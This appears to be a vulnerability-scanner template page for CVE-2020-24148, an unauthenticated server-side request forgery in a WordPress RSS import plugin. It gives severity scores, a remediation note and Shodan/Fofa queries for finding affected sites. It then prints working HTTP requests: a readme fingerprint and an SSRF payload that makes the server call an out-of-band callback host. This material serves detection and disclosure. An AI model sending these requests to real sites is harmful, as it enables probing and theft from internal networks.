| Title | Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery |
|---|---|
| Author | dwisiswant0 |
| Severity | Critical |
| Impact | Unauthenticated attackers can perform server-side request forgery to access internal resources, scan internal networks, or retrieve sensitive data from internal systems. |
| Remediation | Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability. |
| CVSS Score | 9.1 |
| EPSS Score | 0.92759 |
| CVE ID | CVE-2020-24148 |
| CWE ID | CWE-918 |
| Shodan Query | http.html:"import-xml-feed" |
| Fofa Query | body="import-xml-feed" |
| Tags | cve cve2020 wordpress wp-plugin ssrf mooveagency vuln |
WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.
GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.6
Connection: close
Accept-Encoding: gzip
POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Connection: close
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
type=url&data=http%3A%2F%2Fd5jonv1le0o46o05ini0gude4tuy8kt7s.oast.pro%2F&xmlaction=preview&node=0
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24148.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-24148.pcap
N/AN/A